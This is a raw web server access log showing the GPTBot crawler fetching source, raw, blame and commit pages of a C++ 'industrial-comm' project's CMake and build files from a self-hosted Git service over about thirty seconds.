"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10505] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" -[17/Feb/2026:15:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10505] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" -[17/Feb/2026:15:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11261] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21046] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode" -[17/Feb/2026:15:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode" -[17/Feb/2026:15:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" -[17/Feb/2026:15:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10697] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" -[17/Feb/2026:15:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21046] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11257] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11357] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" -[17/Feb/2026:15:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" -[17/Feb/2026:15:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" -[17/Feb/2026:15:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10695] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" -[17/Feb/2026:15:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10705] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" -[17/Feb/2026:15:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10404] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10280] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10418] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10404] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10404] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10281] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25622] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25627] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" -[17/Feb/2026:15:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" -[17/Feb/2026:15:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10876] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" -[17/Feb/2026:15:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10878] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" -[17/Feb/2026:15:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10868] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" -[17/Feb/2026:15:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10504] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" -[17/Feb/2026:15:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" [Client 74.7.227.38] [Length 10721] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" -[17/Feb/2026:15:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" [Client 74.7.227.38] [Length 10725] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" -[17/Feb/2026:15:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" [Client 74.7.227.38] [Length 10727] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" -[17/Feb/2026:15:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" [Client 74.7.227.38] [Length 10724] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" -[17/Feb/2026:15:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" [Client 74.7.227.38] [Length 10725] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" -[17/Feb/2026:15:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10422] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14158] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14159] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 